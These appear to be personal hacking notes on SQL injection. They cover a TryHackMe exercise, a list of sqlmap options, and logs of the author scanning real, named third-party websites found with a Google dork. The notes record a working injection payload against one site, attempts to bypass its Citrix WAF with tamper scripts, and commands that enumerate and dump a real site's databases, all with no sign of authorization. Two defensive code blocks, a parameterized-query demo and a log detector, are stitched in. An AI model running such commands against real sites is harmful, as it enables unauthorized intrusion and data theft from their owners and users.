
SQL Attack

https://tryhackme.com/room/sqlinjectionlm

The key to discovering error-based SQL Injection is to break the code's SQL query by trying
certain characters until an error message is produced; these are most commonly single
apostrophes ( ' ) or a quotation mark ( " ).

Try typing an apostrophe ( ' ) after the id=1 and press Enter. You'll see this returns an
SQL error informing you of an error in your syntax. The fact that you've received this error
message confirms the existence of an SQL Injection vulnerability. We can now exploit this
vulnerability and use the error messages to learn more about the database structure.
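As an added illustration (not part of the TryHackMe room text above), the script below reproduces the symptom on a throwaway in-memory SQLite table and shows the fix side by side. The table, rows, inputs and function names are constructed for this example. `lookup_unsafe` builds the query by string concatenation, so an apostrophe in the id breaks the SQL and surfaces a database error (the signal the room describes), and a boolean condition pasted after the id is evaluated by the database; `lookup_safe` binds the value as a parameter, so the same inputs are treated purely as data and simply match no row.

```python
"""Error-based SQL injection symptom and its fix on an in-memory SQLite table.

Added example, not code from the TryHackMe room; table, rows and inputs are constructed.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database with three constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO article (id, title) VALUES (?, ?)",
        [(1, "First post"), (2, "Second post"), (3, "Third post")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable pattern: the request parameter is concatenated into the SQL text,
    so whatever the client sends becomes part of the query's grammar."""
    query = "SELECT title FROM article WHERE id = " + user_id
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened pattern: the parameter is bound through a placeholder, so the
    database only ever sees it as a value to compare against the id column."""
    rows = conn.execute("SELECT title FROM article WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


def probe(conn: sqlite3.Connection, lookup, user_id: str) -> str:
    """Run one lookup and report either the rows or the database error text.

    In the vulnerable version the error text is what the room's exercise sees
    echoed back by the page; a real application should log it server-side and
    return a generic error instead of sending it to the client.
    """
    try:
        return "rows: " + repr(lookup(conn, user_id))
    except sqlite3.Error as exc:
        return "error: " + str(exc)


if __name__ == "__main__":
    db = make_db()
    # A normal id, the apostrophe from the room, and a boolean condition in the
    # same shape as the AND 6330=6330 payload seen later in these notes.
    for value in ("1", "1'", "3 AND 6330=6330", "3 AND 6330=6331"):
        print(f"{value!r:>20}  unsafe -> {probe(db, lookup_unsafe, value)}")
        print(f"{'':>20}  safe   -> {probe(db, lookup_safe, value)}")
```

Running it shows the contrast directly: the unsafe lookup raises a syntax error for `1'` and returns "Third post" for `3 AND 6330=6330` (the condition was executed), while the safe lookup returns an empty list for both, because the whole string is compared against the id column as a value.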

SQL MAP
https://www.youtube.com/watch?v=QsMkQMKsIII

Note: after https://www.sngpl.com.pk/, try http://berkeleyrecycling.org

To find a vulnerable site, use the dork: inurl:php?id=1

1) To automate (so it won't prompt for yes/no answers), use --batch


2) To specify the technique:

sqlmap -u http://www.abc.com --crawl 3 --technique="U" (U means union-based, and --crawl 3 means crawl
to the 3rd depth)

3) For threads:

4) When the tool can't find vulnerabilities, it can raise the risk by trying riskier payloads. We can
give the value 1, 2 or 3; increasing the number from 1 to 3 makes it check more severe payloads.

5) When the tool can't find vulnerabilities, we can increase the level to widen the search:
for example, at level 2 it also checks the cookie for vulnerabilities, and at level 3 it also
goes into the User-Agent header. This means we are increasing the range of our testing. We can
assign values from 1 to 5.
One thing to notice is that increasing the level and risk also increases the chance of
false positives.
After the scan is completed, we can copy the vulnerable URL in order to exploit it.

6) Verbosity gives us the details while looking for vulnerabilities.

2 - shows the debugging messages on the screen
3 - shows the payload it is trying
4 - shows the HTTP request (in which form it is going)
5 - shows the response headers
6 - shows the response page's contents
By default 1 is selected.

To see HTTP headers.

7) If we have found a vulnerable URL, how to exploit it or get more details out of it.
I found the vulnerable URL of https://www.sngpl.com.pk/ by running the command:
sqlmap -u https://www.sngpl.com.pk/ --crawl 2 --batch --threads 5 --risk 2 --level 1

For current user

For DB and hostname

The results I got from the txt file:


web application technology: JSP
back-end DBMS: Oracle
Payload: pgids=3605' AND 6330=6330 AND 'yeqQ'='yeqQ&pgname=PAGES_NAME_a&secs=ss7xa852op845&cats=ct456712337&artcl=artuyh709123465
WAF/IPS identified as 'NetScaler AppFirewall (Citrix)'
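The payload in the output above (an apostrophe, AND, and a tautology such as 6330=6330) together with items 4 and 5 (probes moving into the cookie and User-Agent at higher levels, several threads at once) describe what such a scan looks like from the server side. The following added example, which is not part of these notes or the linked video, parses a few constructed Apache-style access log lines (the addresses, paths and agent strings are made up) and flags both the individual probe requests and the source address that sent a burst of them. The rule names and the threshold are assumptions chosen for the example.

```python
"""Flagging sqlmap-style SQL injection probing in web server access logs.

Added example, not from the notes or the linked video. The log lines below are
constructed in Apache "combined" format; addresses, paths and agents are made up.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample: one ordinary visitor (198.51.100.7) and a burst of probes
# from a single client (203.0.113.9): a bare quote that triggered a 500, the
# boolean/tautology payload shape seen in the scan output above, a UNION probe
# and a space2comment-style payload with the spaces replaced by /**/.
SAMPLE_LOG_LINES = [
    '198.51.100.7 - - [10/Mar/2024:12:00:01 +0000] "GET /page.jsp?pgids=3605 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:12:00:05 +0000] "GET /page.jsp?pgids=3605%27 HTTP/1.1" 500 312 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.9 - - [10/Mar/2024:12:00:05 +0000] "GET /page.jsp?pgids=3605%27%20AND%206330%3D6330%20AND%20%27yeqQ%27%3D%27yeqQ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:12:00:06 +0000] "GET /page.jsp?pgids=3605%20UNION%20ALL%20SELECT%20NULL,NULL-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:12:00:06 +0000] "GET /page.jsp?pgids=3605/**/AND/**/1=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:12:00:09 +0000] "GET /page.jsp?pgids=3606 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
]

# Apache "combined" log format: ip ident user [time] "method path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule (name is an assumed label) is applied to the URL-decoded request path.
RULES = [
    ("quote_then_boolean", re.compile(r"['\"]\s*(?:AND|OR)\b", re.I)),   # 3605' AND ...
    ("tautology", re.compile(r"\b(\d+)\s*=\s*\1\b")),                      # 6330=6330, 1=1
    ("union_select", re.compile(r"\bUNION\b.{0,20}\bSELECT\b", re.I)),    # UNION ALL SELECT
    ("sql_comment", re.compile(r"--|/\*.*?\*/")),                          # -- or /**/
]


def parse_line(line: str):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def classify(entry: dict) -> list:
    """Return the list of rule names that fire for one parsed request (empty if clean)."""
    decoded = unquote_plus(entry["path"])
    reasons = [name for name, pattern in RULES if pattern.search(decoded)]
    if "sqlmap" in entry["ua"].lower():
        reasons.append("sqlmap_user_agent")          # default agent unless --random-agent is used
    if ("'" in decoded or '"' in decoded) and entry["status"].startswith("5"):
        reasons.append("quote_with_server_error")    # a lone quote that broke the query
    return reasons


def analyze(lines, threshold: int = 3):
    """Scan log lines; return (findings, scanners).

    findings: one dict per request that matched at least one rule.
    scanners: source addresses with at least `threshold` flagged requests
              (assumed cut-off), i.e. the burst pattern of an automated scan.
    """
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "path": unquote_plus(entry["path"]), "reasons": reasons})
    hits = Counter(f["ip"] for f in findings)
    scanners = sorted(ip for ip, count in hits.items() if count >= threshold)
    return findings, scanners


if __name__ == "__main__":
    found, sources = analyze(SAMPLE_LOG_LINES)
    for f in found:
        print(f"{f['ip']} {f['ts']} {f['path']} -> {', '.join(f['reasons'])}")
    print("scanning sources:", sources)
```

The rules are deliberately narrow (a quote followed by a boolean keyword, a numeric tautology, UNION ... SELECT, comment sequences) so that ordinary inputs containing an apostrophe are not flagged on their own; a lone quote only counts when the server answered with a 5xx, which is the error-based symptom the notes above rely on. The per-source count is what separates a single odd request from a sqlmap run with several threads.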

8) For database details:

sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 -D Oracle --tables --threads 5

Results:

No tables found in the Oracle database FOR sngpl

Others I tried along with the above:

https://www.mohtasibsindh.gov.pk/index.php?id=1

https://www.minddesign.co.uk/show.php?id=174

http://esjindex.org/search.php?id=1

http://www.gdilabs.com/

9) Things I tried to bypass the WAF for the sngpl website:

sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 --random-agent -v 3 --tamper="between,randomcase,space2comment" -D Oracle --tables

Another command:

sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbms "Oracle" Oracle --schema

https://www.websec.ca/publication/Blog/Bypassing_WAFs_with_SQLMap

https://hacknopedia.com/2022/07/29/sqlmap-tamper-script-collection/

https://securityonline.info/sqlmap-tamper-script-bypassing-waf/
In the tamper option:
apostrophemask.py, apostrophenullencode.py, appendnullbyte.py, base64encode.py, between.py, bluecoat.py, chardoubleencode.py, charencode.py, charunicodeencode.py, concat2concatws.py, equaltolike.py, greatest.py, halfversionedmorekeywords.py, ifnull2ifisnull.py, lowercase.py, modsecurityversioned.py, modsecurityzeroversioned.py, multiplespaces.py, nonrecursivereplacement.py, overlongutf8.py, percentage.py, randomcase.py, randomcomments.py, securesphere.py, sp_password.py, space2comment.py, space2dash.py, space2hash.py, space2morehash.py, space2mssqlblank.py, space2mssqlhash.py, space2mysqlblank.py, space2mysqldash.py, space2plus.py, space2randomblank.py, unionalltounion.py, unmagicquotes.py, varnish.py, versionedkeywords.py, versionedmorekeywords.py

10) Working on https://www.minddesign.co.uk/show.php?id=174
sqlmap -u https://www.minddesign.co.uk/show.php?id=174 --current-user --current-db --hostname --batch

11) For database details


sqlmap -u https://www.minddesign.co.uk/show.php?id=174 --dbs

The listing also includes the default system schema "information_schema" alongside the application database.

12) To see tables


sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata --tables

13) To see all data of a table

sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata -T modern_cat --dump
14) To see columns and their data types

sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata -T modern_cat --columns

15) To dump all data


sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata --dump-all
